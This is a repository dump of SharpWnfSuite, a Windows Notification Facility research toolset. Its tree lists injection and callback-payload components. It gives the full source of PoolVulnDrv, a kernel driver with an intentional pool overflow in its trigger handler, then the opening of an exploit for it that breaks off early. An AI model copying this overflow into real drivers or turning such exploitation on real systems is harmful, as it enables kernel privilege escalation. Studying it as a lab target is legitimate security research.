Showing preview only (5,617K chars total). Download the full file or copy to clipboard to get everything.
Repository: daem0nc0re/SharpWnfSuite
Branch: main
Commit: b117f1fa4bcc
Files: 169
Total size: 5.3 MB
Directory structure:
gitextract_pkqmh3wi/
├── .gitignore
├── KernelPrimitive/
│ ├── PoolVulnDrv/
│ │ ├── PoolVulnDrv/
│ │ │ ├── PoolVulnDrv.cpp
│ │ │ ├── PoolVulnDrv.h
│ │ │ ├── PoolVulnDrv.vcxproj
│ │ │ └── PoolVulnDrv.vcxproj.filters
│ │ └── PoolVulnDrv.sln
│ └── WnfPoolOverflow/
│ ├── WnfPoolOverflow/
│ │ ├── App.config
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── WnfPoolOverflow.cs
│ │ └── WnfPoolOverflow.csproj
│ └── WnfPoolOverflow.sln
├── LICENSE
├── README.md
├── SharpWnfSuite/
│ ├── SharpWnfClient/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── HexDump.cs
│ │ │ └── WnfCom.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfClient.cs
│ │ └── SharpWnfClient.csproj
│ ├── SharpWnfDump/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── Globals.cs
│ │ │ ├── Helpers.cs
│ │ │ ├── HexDump.cs
│ │ │ └── Modules.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfDump.cs
│ │ └── SharpWnfDump.csproj
│ ├── SharpWnfInject/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Delegates.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── Globals.cs
│ │ │ ├── Helpers.cs
│ │ │ ├── Modules.cs
│ │ │ └── Utilities.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfInject.cs
│ │ └── SharpWnfInject.csproj
│ ├── SharpWnfNameDumper/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Library/
│ │ │ ├── Header.cs
│ │ │ ├── Helpers.cs
│ │ │ └── Modules.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfNameDumper.cs
│ │ └── SharpWnfNameDumper.csproj
│ ├── SharpWnfScan/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Delegates.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── Globals.cs
│ │ │ ├── Header.cs
│ │ │ ├── Helpers.cs
│ │ │ ├── Modules.cs
│ │ │ └── Utilities.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfScan.cs
│ │ └── SharpWnfScan.csproj
│ ├── SharpWnfServer/
│ │ ├── App.config
│ │ ├── Handler/
│ │ │ ├── CommandLineParser.cs
│ │ │ └── Execute.cs
│ │ ├── Interop/
│ │ │ ├── NativeMethods.cs
│ │ │ ├── WellKnownStateName1507.cs
│ │ │ ├── WellKnownStateName1511.cs
│ │ │ ├── WellKnownStateName1607.cs
│ │ │ ├── WellKnownStateName1703.cs
│ │ │ ├── WellKnownStateName1709.cs
│ │ │ ├── WellKnownStateName1803.cs
│ │ │ ├── WellKnownStateName1809.cs
│ │ │ ├── WellKnownStateName1903To1909.cs
│ │ │ ├── WellKnownStateName2004To21H1.cs
│ │ │ ├── WellKnownStateName2022.cs
│ │ │ ├── WellKnownStateName21H2.cs
│ │ │ ├── WellKnownStateName22H2.cs
│ │ │ ├── WellKnownStateName23H2.cs
│ │ │ ├── WellKnownStateName24H2.cs
│ │ │ ├── Win32Consts.cs
│ │ │ ├── Win32Enums.cs
│ │ │ └── Win32Structs.cs
│ │ ├── Library/
│ │ │ ├── HexDump.cs
│ │ │ └── WnfCom.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpWnfServer.cs
│ │ └── SharpWnfServer.csproj
│ └── SharpWnfSuite.sln
└── WnfCallbackPayload/
├── README.md
├── WnfCallbackPayload/
│ ├── WnfCallbackPayload.c
│ ├── WnfCallbackPayload.vcxproj
│ ├── WnfCallbackPayload.vcxproj.filters
│ ├── WnfCallbackPayload.vcxproj.user
│ └── function_order.txt
└── WnfCallbackPayload.sln
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
.DS_Store
bin/
obj/
.vs/
x64/
ARM64/
Debug/
Release/
================================================
FILE: KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.cpp
================================================
#include <ntddk.h>
#include "PoolVulnDrv.h"
PVOID g_PoolPointer = nullptr;
void PoolVulnDrvUnload(_In_ PDRIVER_OBJECT DriverObject);
NTSTATUS PoolVulnDrvCreateClose(_In_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp);
NTSTATUS PoolVulnDrvDeviceControl(_In_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp);
NTSTATUS AllocateOverflowBufferHandler(_In_ PVOID UserBuffer, _In_ SIZE_T Size);
NTSTATUS FreeOverflowBufferHandler();
NTSTATUS TriggerOverflowHandler(_In_ PVOID UserBuffer, _In_ SIZE_T Size);
extern "C"
NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING)
{
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\PoolVulnDrv");
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\PoolVulnDrv");
PDEVICE_OBJECT DeviceObject = nullptr;
NTSTATUS status = STATUS_SUCCESS;
do
{
status = IoCreateDevice(DriverObject, 0, &devName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);
if (!NT_SUCCESS(status))
{
DbgPrint("Failed to create device (ntstatus = 0x%08X).\n", status);
break;
}
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status))
{
DbgPrint("Failed to create symbolic link (ntstatus = 0x%08X).\n", status);
break;
}
} while (false);
if (!NT_SUCCESS(status))
{
if (DeviceObject)
IoDeleteDevice(DeviceObject);
return status;
}
DriverObject->DriverUnload = PoolVulnDrvUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] = PoolVulnDrvCreateClose;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = PoolVulnDrvCreateClose;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = PoolVulnDrvDeviceControl;
DeviceObject->Flags |= DO_DIRECT_IO;
DeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
DbgPrint("PoolVulnDrv is loaded successfully.\n");
return STATUS_SUCCESS;
}
void PoolVulnDrvUnload(_In_ PDRIVER_OBJECT DriverObject)
{
PVOID pFree = g_PoolPointer;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\PoolVulnDrv");
if (pFree)
{
ExFreePoolWithTag(g_PoolPointer, (ULONG)VULN_POOL_TAG);
g_PoolPointer = nullptr;
DbgPrint("Free'd buffer @ 0x%p.\n", pFree);
}
IoDeleteSymbolicLink(&symLink);
IoDeleteDevice(DriverObject->DeviceObject);
DbgPrint("PoolVulnDrv is unloaded.\n");
}
NTSTATUS PoolVulnDrvCreateClose(_In_ PDEVICE_OBJECT, _Inout_ PIRP Irp)
{
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
NTSTATUS PoolVulnDrvDeviceControl(_In_ PDEVICE_OBJECT, _Inout_ PIRP Irp)
{
auto IrpSp = IoGetCurrentIrpStackLocation(Irp);
auto IoctlCode = IrpSp->Parameters.DeviceIoControl.IoControlCode;
auto UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
auto Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;
auto status = STATUS_INVALID_DEVICE_REQUEST;
ULONG info = 0;
switch (IoctlCode)
{
case IOCTL_ALLOC_OVERFLOW_BUFFER:
status = AllocateOverflowBufferHandler(UserBuffer, Size);
if (NT_SUCCESS(status))
info = Size;
break;
case IOCTL_FREE_OVERFLOW_BUFFER:
status = FreeOverflowBufferHandler();
break;
case IOCTL_TRIGGER_OVERFLOW:
status = TriggerOverflowHandler(UserBuffer, Size);
if (NT_SUCCESS(status))
info = Size;
break;
}
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = info;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
NTSTATUS AllocateOverflowBufferHandler(_In_ PVOID UserBuffer, _In_ SIZE_T Size)
{
NTSTATUS status;
if (g_PoolPointer)
{
DbgPrint("Buffer is already allocated.\n");
return STATUS_INVALID_DEVICE_REQUEST;
}
__try
{
ProbeForRead(UserBuffer, Size, (ULONG)__alignof(UCHAR));
g_PoolPointer = ExAllocatePoolWithTag(PagedPool, Size, (ULONG)VULN_POOL_TAG);
if (g_PoolPointer == nullptr)
{
DbgPrint("Failed to allocate paged pool.\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
DbgPrint("Allocated buffer @ 0x%p.\n", g_PoolPointer);
RtlCopyMemory(g_PoolPointer, UserBuffer, Size);
}
__except (EXCEPTION_EXECUTE_HANDLER)
{
status = GetExceptionCode();
DbgPrint("Exception : 0x%08X\n", status);
return status;
}
return STATUS_SUCCESS;
}
NTSTATUS FreeOverflowBufferHandler()
{
if (g_PoolPointer == nullptr)
{
DbgPrint("Buffer have not been allocated.\n");
return STATUS_INVALID_DEVICE_REQUEST;
}
PVOID pFree = g_PoolPointer;
ExFreePoolWithTag(g_PoolPointer, (ULONG)VULN_POOL_TAG);
g_PoolPointer = nullptr;
DbgPrint("Free'd buffer @ 0x%p.\n", pFree);
return STATUS_SUCCESS;
}
NTSTATUS TriggerOverflowHandler(_In_ PVOID UserBuffer, _In_ SIZE_T Size)
{
NTSTATUS status;
__try
{
ProbeForRead(UserBuffer, Size, (ULONG)__alignof(UCHAR));
RtlCopyMemory(g_PoolPointer, UserBuffer, Size);
DbgPrint("Triggered overflow.\n");
}
__except (EXCEPTION_EXECUTE_HANDLER)
{
status = GetExceptionCode();
DbgPrint("Exception : 0x%08X\n", status);
return status;
}
return STATUS_SUCCESS;
}
================================================
FILE: KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.h
================================================
#pragma once
#pragma warning(disable : 4996)
#define POOLVULNDRV_DEVICE 0xdead
#define VULN_POOL_TAG 'daed'
// 0xDEAD2003
#define IOCTL_ALLOC_OVERFLOW_BUFFER \
CTL_CODE(POOLVULNDRV_DEVICE, 0X800, METHOD_NEITHER, FILE_ANY_ACCESS)
// 0xDEAD2007
#define IOCTL_FREE_OVERFLOW_BUFFER \
CTL_CODE(POOLVULNDRV_DEVICE, 0X801, METHOD_NEITHER, FILE_ANY_ACCESS)
// 0xDEAD200B
#define IOCTL_TRIGGER_OVERFLOW \
CTL_CODE(POOLVULNDRV_DEVICE, 0X802, METHOD_NEITHER, FILE_ANY_ACCESS)
typedef struct _ALLOCATED_BUFFER_INFO
{
ULONG_PTR Buffer;
ULONG Size;
ULONG PoolTag;
} ALLOCATED_BUFFER_INFO, *PALLOCATED_BUFFER_INFO;
================================================
FILE: KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{E04E7BA8-3825-41F8-A19A-6A176A4C3846}</ProjectGuid>
<TemplateGuid>{dd38f7fc-d7bd-488b-9242-7d8754cde80d}</TemplateGuid>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<MinimumVisualStudioVersion>12.0</MinimumVisualStudioVersion>
<Configuration>Debug</Configuration>
<Platform Condition="'$(Platform)' == ''">Win32</Platform>
<RootNamespace>PoolVulnDrv</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windows10</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>WDM</DriverType>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windows10</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>WDM</DriverType>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windows10</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>WDM</DriverType>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<TargetVersion>Windows10</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>WDM</DriverType>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windows10</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>WDM</DriverType>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windows10</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>WDM</DriverType>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windows10</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>WDM</DriverType>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windows10</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>WDM</DriverType>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DriverSign>
<FileDigestAlgorithm>sha256</FileDigestAlgorithm>
</DriverSign>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DriverSign>
<FileDigestAlgorithm>sha256</FileDigestAlgorithm>
</DriverSign>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DriverSign>
<FileDigestAlgorithm>sha256</FileDigestAlgorithm>
</DriverSign>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<DriverSign>
<FileDigestAlgorithm>sha256</FileDigestAlgorithm>
</DriverSign>
<ClCompile>
<WarningLevel>Level4</WarningLevel>
</ClCompile>
</ItemDefinitionGroup>
<ItemGroup>
<FilesToPackage Include="$(TargetPath)" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="PoolVulnDrv.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="PoolVulnDrv.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: KernelPrimitive/PoolVulnDrv/PoolVulnDrv/PoolVulnDrv.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Driver Files">
<UniqueIdentifier>{8E41214B-6785-4CFE-B992-037D68949A14}</UniqueIdentifier>
<Extensions>inf;inv;inx;mof;mc;</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="PoolVulnDrv.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="PoolVulnDrv.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
================================================
FILE: KernelPrimitive/PoolVulnDrv/PoolVulnDrv.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.31829.152
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PoolVulnDrv", "PoolVulnDrv\PoolVulnDrv.vcxproj", "{E04E7BA8-3825-41F8-A19A-6A176A4C3846}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|ARM = Debug|ARM
Debug|ARM64 = Debug|ARM64
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|ARM = Release|ARM
Release|ARM64 = Release|ARM64
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|ARM.ActiveCfg = Debug|ARM
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|ARM.Build.0 = Debug|ARM
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|ARM.Deploy.0 = Debug|ARM
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|ARM64.ActiveCfg = Debug|ARM64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|ARM64.Build.0 = Debug|ARM64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|ARM64.Deploy.0 = Debug|ARM64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|x64.ActiveCfg = Debug|x64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|x64.Build.0 = Debug|x64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|x64.Deploy.0 = Debug|x64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|x86.ActiveCfg = Debug|Win32
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|x86.Build.0 = Debug|Win32
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Debug|x86.Deploy.0 = Debug|Win32
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|ARM.ActiveCfg = Release|ARM
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|ARM.Build.0 = Release|ARM
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|ARM.Deploy.0 = Release|ARM
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|ARM64.ActiveCfg = Release|ARM64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|ARM64.Build.0 = Release|ARM64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|ARM64.Deploy.0 = Release|ARM64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|x64.ActiveCfg = Release|x64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|x64.Build.0 = Release|x64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|x64.Deploy.0 = Release|x64
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|x86.ActiveCfg = Release|Win32
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|x86.Build.0 = Release|Win32
{E04E7BA8-3825-41F8-A19A-6A176A4C3846}.Release|x86.Deploy.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {E7251307-4543-41AC-A564-DA3F9A02171B}
EndGlobalSection
EndGlobal
================================================
FILE: KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/App.config
================================================
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
</startup>
</configuration>
================================================
FILE: KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/Properties/AssemblyInfo.cs
================================================
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("WnfPoolOverflow")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("WnfPoolOverflow")]
[assembly: AssemblyCopyright("Copyright © 2022")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("f0bd0a85-a06b-483a-8a46-c6fe10677d1e")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
================================================
FILE: KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/WnfPoolOverflow.cs
================================================
using System;
using System.Text;
using System.Runtime.InteropServices;
namespace WnfPoolOverflow
{
class WnfPoolOverflow
{
/*
* P/Invoke : Enum
*/
[Flags]
enum ACCESS_MASK : uint
{
DELETE = 0x00010000,
READ_CONTROL = 0x00020000,
WRITE_DAC = 0x00040000,
WRITE_OWNER = 0x00080000,
SYNCHRONIZE = 0x00100000,
STANDARD_RIGHTS_REQUIRED = 0x000F0000,
STANDARD_RIGHTS_READ = 0x00020000,
STANDARD_RIGHTS_WRITE = 0x00020000,
